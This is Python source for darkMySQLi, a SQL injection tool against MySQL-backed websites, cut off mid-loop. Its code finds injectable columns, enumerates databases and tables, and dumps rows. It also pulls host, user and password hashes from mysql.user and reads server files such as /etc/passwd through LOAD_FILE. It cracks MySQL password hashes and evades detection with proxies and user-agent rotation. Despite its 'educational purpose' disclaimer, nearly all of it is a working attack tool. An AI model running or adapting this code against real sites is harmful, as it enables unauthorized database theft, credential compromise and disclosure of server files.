reverenddigitalx, rechemen # and the darkc0de crew # This was written for educational purpose only. Use it at your own risk. # Author will be not responsible for any damage! # Intended for authorized Web Application Pen Testing! # CHANGES # 1.6 ADDED --end evasion setting # 1.5 Fixed --strart now starts at correct number instead of +1 # 1.4 Fixed schema mode when a table was specified - app would hand after last column # 1.3 Fixed Regular Expression Search in dump mode (should fixs issues of crazy html code when dumping) # 1.2 Fixed mode findcol - the way it replaced darkc0de in the output URL string # BE WARNED, THIS TOOL IS VERY LOUD.. import urllib, sys, re, os, socket, httplib, urllib2, time, random ##Set default evasion options here arg_end = "--" # examples "--", "/*", "#", "%00", "--&SESSIONID=00hn3gvs21lu5ke2f03bxr" <-- if you need vars after inj point arg_eva = "+" # examples "/**/" ,"+", "%20" ## colMax variable for column Finder colMax = 200 ## Set the default timeout value for requests socket.setdefaulttimeout(10) ## Default Log File Name logfile = "darkMySQLi.log" ## File Location to fuzz with for TABLE fuzzer tablefuzz = "tablesfuzz.txt" ## File Location to fuzz with for COLUMN fuzzer columnfuzz = "columnsfuzz.txt" ## File Location to fuzz with for LOAD_FILE fuzzer loadfilefuzz = "loadfilefuzz.txt" ## Agents agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)", "Microsoft Internet Explorer/4.0b1 (Windows 95)", "Opera/8.00 (Windows NT 5.1; U; en)"] #URL Get Function def GetThatShit(head_URL): source = "" global gets;global proxy_num head_URL = head_URL.replace("+",arg_eva) request_web = urllib2.Request(head_URL) request_web.add_header('User-Agent',agent) while len(source) < 1: if arg_debug == "on": print "\n[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" try: gets+=1;proxy_num+=1 source = proxy_list[proxy_num % proxy_len].open(request_web).read() except (KeyboardInterrupt, SystemExit): raise except (urllib2.HTTPError): print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Trying again!" print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" break except: print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Look at the error and try to figure it out!" print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" raise return source #the guts and glory - Binary Algorithim that does all the guessing for the Blind Methodology def GuessValue(URL): lower = lower_bound;upper = upper_bound while lower < upper: try: mid = (lower + upper) / 2 head_URL = URL + ">"+str(mid) source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 1: lower = mid + 1 else: upper = mid except (KeyboardInterrupt, SystemExit): raise except: pass if lower > lower_bound and lower < upper_bound: value = lower else: head_URL = URL + "="+str(lower) source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 1: value = lower else: value = 63 print "Could not find the ascii character! There must be a problem.." print "Check to make sure your using the my script right!" print "READ xprog's blind sql tutorial!\n" sys.exit(1) return value ## Functions for MySQL5 hash cracking --- THANKS d3hydr8 def c1(word): s = hashlib.sha1() s.update(word[:-1]) s2 = hashlib.sha1() s2.update(s.digest()) return s2.hexdigest() def c2(word): s = sha.new() s.update(word[:-1]) s2 = sha.new() s2.update(s.digest()) return s2.hexdigest() ## Funtion for MySQL323 hash cracking def mysql323(clear): # Taken almost verbatim from mysql's source nr = 1345345333 add = 7 nr2 = 0x12345671 retval = "" for c in clear: if c == ' ' or c == '\t': continue tmp = ord(c) nr ^= (((nr & 63) + add) * tmp) + (nr << 8) nr2 += (nr2 << 8) ^ nr add += tmp res1 = nr & ((1 << 31) - 1) res2 = nr2 & ((1 << 31) - 1) return "%08lx%08lx" % (res1, res2) #say hello if len(sys.argv) <= 1: print "\n|--------------------------------------------------|" print "| rsauron@gmail.com v1.6 |" print "| 1/2009 darkMySQLi.py |" print "| -- Multi Purpose MySQL Injection Tool -- |" print "| Usage: darkMySQLi.py [options] |" print "| -h help darkc0de.com |" print "|--------------------------------------------------|\n" sys.exit(1) #help option for arg in sys.argv: if arg == "-h" or arg == "--help": print "\n darkMySQLi v1.6 rsauron@gmail.com" print " forum.darkc0de.com" print "Usage: ./darkMySQLi.py [options]" print "Options:" print " -h, --help shows this help message and exits" print " -d, --debug display URL debug information\n" print " Target:" print " -u URL, --url=URL Target url\n" print " Methodology:" print " -b, --blind Use blind methodology (req: --string)" print " -s, --string String to match in page when the query is valid" print " Method:" print " --method=PUT Select to use PUT method ** NOT WORKING" print " Modes:" print " --dbs Enumerate databases MySQL v5+" print " --schema Enumerate Information_schema (req: -D," print " opt: -T) MySQL v5+" print " --full Enumerate all we can MySQL v5+" print " --info MySQL Server configuration MySQL v4+" print " --fuzz Fuzz Tables & Columns Names MySQL v4+" print " --findcol Find Column length MySQL v4+" print " --dump Dump database table entries (req: -T," print " opt: -D, -C, --start) MySQL v4+" print " --crack=HASH Crack MySQL Hashs (req: --wordlist)" print " --wordlist=LIS.TXT Wordlist to be used for cracking" print " Define:" print " -D DB database to enumerate" print " -T TBL database table to enumerate" print " -C COL database table column to enumerate" print " Optional:" print " --ssl To use SSL" print " --end To use + and -- for the URLS --end \"--\" (Default)" print " To use /**/ and /* for the URLS --end \"/*\"" print " --rowdisp Do not display row # when dumping" print " --start=ROW Row number to begin dumping at" print " --where=COL,VALUE Use a where clause in your dump" print " --orderby=COL Use a orderby clause in your dump" print " --cookie=FILE.TXT Use a Mozilla cookie file" print " --proxy=PROXY Use a HTTP proxy to connect to the target url" print " --output=FILE.TXT Output results of tool to this file\n" sys.exit(1) #define variables site = "" proxy = "None" arg_string = "" arg_blind = "--union" arg_table = "None" arg_database = "None" arg_columns = "None" arg_row = "Rows" arg_cookie = "None" arg_insert = "None" arg_where = "" arg_orderby = "" arg_debug = "off" arg_rowdisp = 1 arg_adminusers = 10 arg_wordlist = "" arg_ssl = "off" arg_proxy_auth = "" darkc0de = "concat(0x1e,0x1e," mode = "None" lower_bound = 0 upper_bound = 16069 line_URL = "" count_URL = "" cur_db = "" cur_table = "" terminal = "" count = 0 gets = 0 table_num = 0 num = 0 ser_ver = 3 version =[] let_pos = 1 lim_num = 0 agent = "" #Check args for arg in sys.argv: if arg == "-u" or arg == "--url": site = sys.argv[count+1] elif arg == "--output": logfile = sys.argv[count+1] elif arg == "--proxy": proxy = sys.argv[count+1] elif arg == "--proxyauth": arg_proxy_auth = sys.argv[count+1] elif arg == "--dump": mode = arg;arg_dump = sys.argv[count] elif arg == "--full": mode = arg elif arg == "--schema": mode = arg;arg_schema = sys.argv[count] elif arg == "--dbs": mode = arg;arg_dbs = sys.argv[count] elif arg == "--fuzz": mode = arg;arg_fuzz = sys.argv[count] elif arg == "--info": mode = arg;arg_info = sys.argv[count] elif arg == "--crack": mode = arg;arg_hash = sys.argv[count+1] elif arg == "--wordlist": arg_wordlist = sys.argv[count+1] elif arg == "--findcol": mode = arg;arg_findcol = sys.argv[count] elif arg == "--cookie": arg_cookie = sys.argv[count+1] elif arg == "--ssl": arg_ssl = "on" elif arg == "-b" or arg == "--blind": arg_blind = arg;arg_blind = sys.argv[count] elif arg == "-s" or arg == "--string": arg_string = sys.argv[count+1] elif arg == "-D": arg_database = sys.argv[count+1] elif arg == "-T": arg_table = sys.argv[count+1] elif arg == "-C": arg_columns = sys.argv[count+1] elif arg == "--start": num = int(sys.argv[count+1]) - 1 table_num = num elif arg == "-d" or arg == "--debug": arg_debug = "on" elif arg == "--where": arg_where = sys.argv[count+1] elif arg == "--orderby": arg_orderby = sys.argv[count+1] elif arg == "--rowdisp": arg_rowdisp = sys.argv[count] arg_rowdisp = 0 elif arg == "--end": arg_end = sys.argv[count+1] if arg_end == "--": arg_eva = "+" else: arg_eva = "/**/" count+=1 #Title write file = open(logfile, "a") print "\n|--------------------------------------------------|" print "| rsauron@gmail.com v1.6 |" print "| 1/2009 darkMySQLi.py |" print "| -- Multi Purpose MySQL Injection Tool -- |" print "| Usage: darkMySQLi.py [options] |" print "| -h help darkc0de.com |" print "|--------------------------------------------------|\n" #Arg Error Checking if mode != "--crack" and site == "": print "[-] URL is required!\n[-] Need Help? --help\n" sys.exit(1) if mode == "None": print "[-] Mode is required!\n[-] Need Help? --help\n" sys.exit(1) if mode == "--schema" and arg_database == "None": print "[-] Must include -D flag!\n[-] Need Help? --help\n" sys.exit(1) if mode == "--dump": if arg_table == "None" or arg_columns == "None": print "[-] Must include -T and -C flag. -D is Optional\n[-] Need Help? --help\n" sys.exit(1) if proxy != "None": if len(proxy.split(".")) == 2: proxy = open(proxy, "r").read() if proxy.endswith("\n"): proxy = proxy.rstrip("\n") proxy = proxy.split("\n") if arg_ssl == "off": if site[:4] != "http": site = "http://"+site else: if site[:5] != "https": site = "https://"+site if site.endswith("/*"): site = site.rstrip('/*') if site.endswith("--"): site = site.rstrip('--') if arg_cookie != "None": try: cj = cookielib.MozillaCookieJar() cj.load(arg_cookie) cookie_handler = urllib2.HTTPCookieProcessor(cj) except: print "[!] There was a problem loading your cookie file!" print "[!] Make sure the cookie file is in Mozilla Cookie File Format!" print "[!] http://xiix.wordpress.com/2006/03/23/mozillafirefox-cookie-format/\n" sys.exit(1) else: cookie_handler = urllib2.HTTPCookieProcessor() if mode != "--findcol" and arg_blind != "--blind" and mode != "--crack" and site.find("darkc0de") == -1: print "[-] Site must contain \'darkc0de\'\n" sys.exit(1) if arg_blind == "--blind" and arg_string == "": print "[-] You must specify a --string when using blind methodology.\n" sys.exit(1) if arg_columns != "None": arg_columns = arg_columns.split(",") if arg_insert != "None": arg_insert = arg_insert.split(",") if mode == "--crack" and arg_wordlist == "": print "[-] You must specify a --wordlist to crack with.\n" sys.exit(1) agent = random.choice(agents) file.write("\n|--------------------------------------------------|") file.write("\n| rsauron@gmail.com v1.6 |") file.write("\n| 1/2009 darkMySQLi.py |") file.write("\n| -- Multi Purpose MySQL Injection Tool -- |") file.write("\n| Usage: darkMySQLi.py [options] |") file.write("\n| -h help darkc0de.com |") file.write("\n|--------------------------------------------------|") ## MySQL Hash cracking if mode == "--crack": try: arg_wordlist = open(arg_wordlist, "r") except(IOError): print "[-] Error: Check your wordlist path\n";file.write("\n[-] Error: Check your wordlist path\n") sys.exit(1) if len(arg_hash) != 40 and len(arg_hash) != 16: print "\n[-] Improper hash length\n";file.write("\n\n[-] Improper hash length\n") sys.exit(1) arg_wordlist = arg_wordlist.readlines() print "[+] Words Loaded:",len(arg_wordlist);file.write("\n[+] Words Loaded: "+str(len(arg_wordlist))) if len(arg_hash) == 40: print "[+] Detected MySQL v5 Hash:",arg_hash;file.write("\n[+] Detected MySQL v5 Hash: "+arg_hash) try: import hashlib for word in arg_wordlist: if arg_hash == c1(word): print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word) break except(ImportError): import sha for word in arg_wordlist: if arg_hash == c2(word): print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word) break else: print "[+] Detected MySQL v4 Hash:",arg_hash print "[+] Try darkc0de hash database @ " for word in arg_wordlist: word = word.rstrip("\n") if arg_hash == mysql323(word): print "\n[!] Password is:",word+"\n";file.write("\n\n[!] Password is: "+word+"\n") break print "[-] Finished Searching..\n[-] Done\n";file.write("\n[-] Finished Searching..\n[-] Done\n") sys.exit(1) #General Info print "[+] URL:",site;file.write("\n\n[+] URL: "+site) print "[+] %s" % time.strftime("%X");file.write("\n[+] %s" % time.strftime("%X")) print "[+] Evasion:",arg_eva,arg_end;file.write("\n[+] Evasion: "+arg_eva+" "+arg_end) print "[+] Cookie:", arg_cookie;file.write("\n[+] Cookie: "+arg_cookie) if site[:5] == "https": print "[+] SSL: Yes";file.write("\n[+] SSL: Yes") else: print "[+] SSL: No";file.write("\n[+] SSL: No") print "[+] Agent:",agent;file.write("\n[+] Agent: "+agent) #Build proxy list proxy_list = [];proxy_list_count = [] if proxy != "None": print "[+] Building Proxy List...";file.write("\n[+] Building Proxy List...") for p in proxy: try: match = re.findall(":",p) if len(match) == 3: arg_proxy_auth = [] prox = p.split(":") arg_proxy_auth += prox if arg_proxy_auth != "": proxy_auth_handler = urllib2.HTTPBasicAuthHandler() proxy_auth_handler.add_password("none",p,arg_proxy_auth[2],arg_proxy_auth[3]) opener = urllib2.build_opener(proxy_auth_handler) opener.open("http://www.google.com") proxy_list.append(urllib2.build_opener(proxy_auth_handler, cookie_handler)) proxy_list_count.append(p);arg_proxy_auth = "" else: proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'}) opener = urllib2.build_opener(proxy_handler) opener.open("http://www.google.com") proxy_list.append(urllib2.build_opener(proxy_handler, cookie_handler)) proxy_list_count.append(p) if len(match) == 3 or len(match) == 1: print "\tProxy:",p,"- Success";file.write("\n\tProxy:"+p+" - Success") else: print "\tProxy:",p,arg_proxy_auth[2]+":"+arg_proxy_auth[3]+"- Success";file.write("\n\tProxy:"+p+" - Success") except: print "\tProxy:",p,"- Failed [ERROR]:",sys.exc_info()[0];file.write("\n\tProxy:"+p+" - Failed [ERROR]: "+str(sys.exc_info()[0])) pass if len(proxy_list) == 0: print "[-] All proxies have failed. App Exiting" sys.exit(1) print "[+] Proxy List Complete";file.write("\n[+] Proxy List Complete") else: print "[-] Proxy Not Given";file.write("\n[+] Proxy Not Given") proxy_list.append(urllib2.build_opener(cookie_handler)) proxy_list_count.append("None") proxy_num = 0 proxy_len = len(proxy_list) ## Blind String checking! if arg_blind == "--blind": print "[!] Blind Methodology will be used!";file.write("\n[!] Blind Methodology will be used!") head_URL = site+"+AND+1=1" source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 2: print "\n[-] The String you used has been found on the target page in-use more than 2 times" print "[-] This might lead to false positives with the blind methodology" print "[-] Might not mean anything.. I am just trying to help out.." print "[-] If you have problems you might know why.. ;-)\n" if len(match) == 0: print "\n[-] The String you used has not been found in the target URL!\n[-] Please try another.\n[-] Done.\n" sys.exit(1) if len(match) == 1: print "[+] Blind String Selected is Good ;-)";file.write("\n[+] Blind String Selected is Good ;-)") #Column Finder c0de if mode == "--findcol": print "[+] Attempting To find the number of columns...";file.write("\n[+] Attempting To find the number of columns...") print "[+] Testing: ", file.write("\n[+] Testing: ",) checkfor=[];nullFound=[];nullnum=[];makepretty = "" sitenew = site+"+AND+1=2+UNION+SELECT+" for x in xrange(1,colMax): try: sys.stdout.write("%s," % (x)) file.write(str(x)+",") sys.stdout.flush() darkc0de = "dark"+str(x)+"code" checkfor.append(darkc0de) if x > 1: sitenew += "," sitenew += "0x"+darkc0de.encode("hex") finalurl = sitenew+arg_end source = GetThatShit(finalurl) for y in checkfor: colFound = re.findall(y,source) if len(colFound) != 0: nullFound.append(colFound[0]) if len(nullFound) >= 1: print "\n[+] Column Length is:",len(checkfor);file.write("\n[+] Column Length is: "+str(len(checkfor))) print "[+] Found null column at column #: ",;file.write("\n[+] Found null column at column #: ",) for z in nullFound: nullcol = re.findall(("\d+"),z) nullnum.append(nullcol[0]) sys.stdout.write("%s," % (nullcol[0])) file.write(str(nullcol[0])+",") sys.stdout.flush() for z in xrange(0,len(checkfor)): z+=1 if z > 1: makepretty += "," makepretty += str(z) site = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva+makepretty+arg_end print "\n\n[!] SQLi URL:",site;file.write("\n\n[!] SQLi URL: "+site) for z in nullnum: site = site.replace("+"+z+",","+darkc0de,") site = site.replace(","+z+",",",darkc0de,") site = site.replace(","+z+arg_end,",darkc0de"+arg_end) print "[!] darkMySQLi URL:",site;file.write("\n[!] darkMySQLi URL: "+site) print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X")) print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets)) print "[-] Done\n";file.write("\n[-] Done\n") print "Don't forget to check", logfile,"\n" file.close();sys.exit(1) except (KeyboardInterrupt, SystemExit): raise except: pass print "\n[!] Sorry Column Length could not be found." file.write("\n[!] Sorry Column Length could not be found.") print "[-] You might try to change colMax variable or change evasion option.. or last but not least do it manually!" print "[-] Done\n" sys.exit(1) #Retrieve version:user:database if arg_blind != "--blind": head_URL = site.replace("darkc0de","concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end print "[+] Gathering MySQL Server Configuration...";file.write("\n[+] Gathering MySQL Server Configuration...\n") source = GetThatShit(head_URL) match = re.findall("\x1e\x1e\S+",source) if len(match) >= 1: match = match[0][0:].split("\x1e") version = match[2] user = match[3] database = match[4] print "\tDatabase:", database;file.write("\tDatabase: "+database+"\n") print "\tUser:", user;file.write("\tUser: "+user+"\n") print "\tVersion:", version;file.write("\tVersion: "+version) else: print "\n[-] There seems to be a problem with your URL. Please check and try again.\n[DEBUG]:",head_URL.replace("+",arg_eva),"\n" sys.exit(1) else: print "[+] Preforming Quick MySQL Version Check...";file.write("\n[+] Preforming Quick MySQL Version Check...") while 1: config_URL = site+"+and+substring(@@version,1,1)="+str(ser_ver) source = GetThatShit(config_URL) match = re.findall(arg_string,source) if len(match) >= 1: print "\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!";file.write("\n\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!") version += str(ser_ver) break if ser_ver == 6: print "[-] Was unable to determine MySQL version.\n[-] Done" sys.exit(1) ser_ver+=1 #lets check what we can do based on version if mode == "--schema" or mode == "--dbs" or mode == "--full": if version[0] == str(4): print "\n[-] Mode Selected is incompatible with MySQL v4 Servers" print "[-] -h for help" sys.exit(1) # Mode --info if mode == "--info" and arg_blind != "--blind": head_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+"+FROM+mysql.user"+arg_end source = GetThatShit(head_URL) match = re.findall("darkc0de",source) if len(match) >= 1: yesno = "YES <-- w00t w00t" else: yesno = "NO" print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno)) if yesno == "YES <-- w00t w00t": print "\n[+] Dumping MySQL user info. host:user:password";file.write("\n\n[+] Dumping MySQL user info. host:user:password") head_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+mysql.user"+arg_end source = GetThatShit(head_URL) match = re.findall("\x1e\x1e\S+",source);match = match[0].strip("\x1e").split("\x1e");userend = match[0] print "[+] Number of users in the mysql.user table:",userend;file.write("[+] Number of users in the mysql.user table: "+str(userend)) head_URL = site.replace("darkc0de","concat(0x1e,0x1e,host,0x1e,user,0x1e,password,0x1e,0x20)") head_URL = head_URL+"+FROM+mysql.user+LIMIT+NUM,1"+arg_end for x in range(0,int(userend)): try: source = GetThatShit(head_URL.replace("NUM",str(x))) match = re.findall("\x1e\x1e\S+",source) match = match[0].strip("\x1e").split("\x1e") if len(match) != 3: nullvar = "NULL" match += nullvar print "\t["+str(x)+"]",match[0]+":"+match[1]+":"+match[2];file.write("\n["+str(x)+"] "+str(match[0])+":"+str(match[1])+":"+str(match[2])) except (KeyboardInterrupt, SystemExit): raise except: pass else: print "\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!" file.write("\n\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!") head_URL = site.replace("darkc0de","concat(load_file(0x2f6574632f706173737764),0x3a,0x6461726b63306465)")+arg_end source = GetThatShit(head_URL) match = re.findall("darkc0de",source) if len(match) >= 1: yesno = "YES <-- w00t w00t" else: yesno = "NO" print "\n[+] Do we have Access to Load_File:",yesno;file.write("\n\n[+] Do we have Access to Load_File: "+str(yesno)) if yesno == "YES <-- w00t w00t": fuzz_load = open(loadfilefuzz, "r").readlines() head_URL = site.replace("darkc0de","concat(load_file('%2Fetc%2Fpasswd'),0x3a,0x6461726b63306465)")+arg_end source = GetThatShit(head_URL) match = re.findall("darkc0de",source) if len(match) > 1: onoff = "OFF <-- w00t w00t" else: onoff = "ON" print "\n[+] Magic quotes are:",onoff yesno = str(raw_input("\n[!] Would You like to fuzz LOAD_FILE (Yes/No): ")) if yesno == "Y" or yesno == "y" or yesno == "Yes" or yesno == "yes": print "\n[+] Starting Load_File Fuzzer...";file.write("\n\n[+] Starting Load_File Fuzzer...") print "[+] Number of system files to be fuzzed:",len(fuzz_load),"\n";file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_load))+"\n") for sysfile in fuzz_load: sysfile = sysfile.rstrip("\n") if proxy != "None": sysfile = sysfile.replace("/","%2F") sysfile = sysfile.replace(".","%2E") if onoff == "OFF <-- w00t w00t": head_URL = site.replace("darkc0de","concat(LOAD_FILE(\'"+sysfile+"\'),0x3a,0x6461726b63306465)")+arg_end else: head_URL = site.replace("darkc0de","concat(LOAD_FILE(0x"+sysfile.encode("hex")+"),0x3a,0x6461726b63306465)")+arg_end source = GetThatShit(head_URL) match = re.findall("darkc0de",source) if len(match) > 0: print "[!] Found",sysfile;file.write("\n[!] Found "+sysfile) head_URL = head_URL.replace("concat(","") head_URL = head_URL.replace(",0x3a,0x6461726b63306465)","") print "[!]",head_URL;file.write("\n[!] "+head_URL) else: print "\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!" file.write("\n\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!") #Fuzz table/columns if mode == "--fuzz": fuzz_tables = open(tablefuzz, "r").readlines() fuzz_columns = open(columnfuzz, "r").readlines() print "[+] Beginning table and column fuzzer...";file.write("[+] Beginning table and column fuzzer...") print "[+] Number of tables names to be fuzzed:",len(fuzz_tables);file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_tables))) print "[+] Number of column names to be fuzzed:",len(fuzz_columns);file.write("\n[+] Number of column names to be fuzzed: "+str(len(fuzz_columns))) print "[+] Searching for tables and columns...";file.write("\n[+] Searching for tables and columns...") if arg_blind == "--blind": fuzz_URL = site+"+and+(SELECT+1+from+TABLE+limit+0,1)=1" else: fuzz_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+"+FROM+TABLE"+arg_end for table in fuzz_tables: table = table.rstrip("\n") table_URL = fuzz_URL.replace("TABLE",table) source = GetThatShit(table_URL) if arg_blind == "--blind": match = re.findall(arg_string,source) else: match = re.findall("darkc0de", source); if len(match) > 0: print "\n[!] Found a table called:",table;file.write("\n\n[+] Found a table called: "+str(table)) print "\n[+] Now searching for columns inside table \""+table+"\"";file.write("\n\n[+] Now searching for columns inside table \""+str(table)+"\"") if arg_blind == "--blind": table_URL = site+"+and+(SELECT+substring(concat(1,COLUMN),1,1)+from+"+table+"+limit+0,1)=1" for column in fuzz_columns: column = column.rstrip("\n") if arg_blind == "--blind": column_URL = table_URL.replace("COLUMN",column) else: column_URL = table_URL.replace("0x6461726b63306465","concat(0x6461726b63306465,0x3a,"+column+")") source = GetThatShit(column_URL) if arg_blind == "--blind": match = re.findall(arg_string,source) else: match = re.findall("darkc0de",source) if len(match) > 0: print "[!] Found a column called:",column;file.write("\n[!] Found a column called:"+column) print "[-] Done searching inside table \""+table+"\" for columns!";file.write("\n[-] Done searching inside table \""+str(table)+"\" for columns!") #Build URLS for each different mode if mode == "--schema": if arg_database != "None" and arg_table == "None": if arg_blind == "--blind": print "[+] Showing Tables from database \""+arg_database+"\"";file.write("\n[+] Showing Tables from database \""+arg_database+"\"") count_URL = site+"+and+((SELECT+COUNT(table_name)" count_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex")+"))" line_URL = site+"+and+ascii(substring((SELECT+table_name" line_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex") else: print "[+] Showing Tables & Columns from database \""+arg_database+"\"" file.write("\n[+] Showing Tables & Columns from database \""+arg_database+"\"") line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)") line_URL += "+FROM+information_schema.columns+WHERE+table_schema=0x"+arg_database.encode("hex") count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(table_schema),0x1e,0x20)") count_URL += "+FROM+information_schema.tables+WHERE+table_schema=0x"+arg_database.encode("hex") arg_row = "Tables" if arg_database != "None" and arg_table != "None": if arg_blind == "--blind": print "[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"" file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"") count_URL = site+"+and+((SELECT+COUNT(column_name)" count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")+"))" line_URL = site+"+and+ascii(substring((SELECT+column_name" line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex") else: print "[+] Showing Columns from Database \""+arg_database+"\" and Table \""+arg_table+"\"" file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"") line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)") line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex") count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex") arg_row = "Columns" elif mode == "--dump": print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"" file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"") print "[+] and Column(s) "+str(arg_columns);file.write("\n[+] Column(s) "+str(arg_columns)) if arg_blind == "--blind": darkc0de = "" for column in arg_columns: darkc0de += column+",0x3a," darkc0de = darkc0de.rstrip("0x3a,") count_URL = site+"+and+((SELECT+COUNT(*)+FROM+"+arg_database+"."+arg_table line_URL = site+"+and+ascii(substring((SELECT+concat("+darkc0de+")+FROM+"+arg_database+"."+arg_table else: for column in arg_columns: darkc0de += column+",0x1e," count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table if arg_where != "" or arg_orderby != "": if arg_where != "": arg_where = arg_where.split(",") print "[+] WHERE clause:","\""+arg_where[0]+"="+arg_where[1]+"\"" arg_where = "WHERE+"+arg_where[0]+"="+"0x"+arg_where[1].encode("hex") if arg_orderby != "": arg_orderby = "ORDER+BY+'"+arg_orderby+"'" print "[+] ORDERBY clause:",arg_orderby count_URL += "+"+arg_where line_URL += "+"+arg_where+"+"+arg_orderby if version[0] == 4: count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_table line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")+"+FROM+"+arg_table elif mode == "--full": print "[+] Starting full SQLi information_schema enumeration..." line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)") line_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex") count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex") elif mode == "--dbs": print "[+] Showing all databases current user has access too!" file.write("\n[+] Showing all databases current user has access too!") if arg_blind == "--blind": count_URL = site+"+and+((SELECT+COUNT(schema_name)" count_URL += "+FROM+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")+"))" line_URL = site+"+and+ascii(substring((SELECT+schema_name" line_URL += "+from+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex") else: count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex") line_URL = site.replace("darkc0de","concat(0x1e,0x1e,schema_name,0x1e,0x20)") line_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex") arg_row = "Databases" if arg_blind == "--blind": count_URL+="))" line_URL+="+LIMIT+" else: count_URL += arg_end line_URL += "+LIMIT+NUM,1"+arg_end ## Blind Info --- I know it doesnt make sence where this code is.. but.. fuck it... if mode == "--info" and arg_blind == "--blind": head_URL = site+"+and+(SELECT+1+from+mysql.user+limit+0,1)=1" source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 1: yesno = "YES <-- w00t w00t\n[!] Retrieve Info: --dump -D mysql -T user -C user,password" else: yesno = "NO" print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno)) print "\n[+] Showing database version, username@location, and database name!" file.write("\n\n[+] Showing database version, username@location, and database name!") line_URL = site+"+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database()))," row_value = 1 #Lets Count how many rows or columns if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full": if arg_blind == "--blind": row_value = GuessValue(count_URL) else: source = GetThatShit(count_URL) match = re.findall("\x1e\x1e\S+",source) match = match[0][2:].split("\x1e") row_value = match[0] print "[+] Number of "+arg_row+": "+str(row_value);file.write("\n[+] Number of "+arg_row+": "+str(row_value)+"\n") ## UNION Schema Enumeration and DataExt loop if arg_blind == "--union": if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full": while int(table_num) != int(row_value): try: source = GetThatShit(line_URL.replace("NUM",str(num))) match = re.findall("\x1e\x1e\S+",source) if 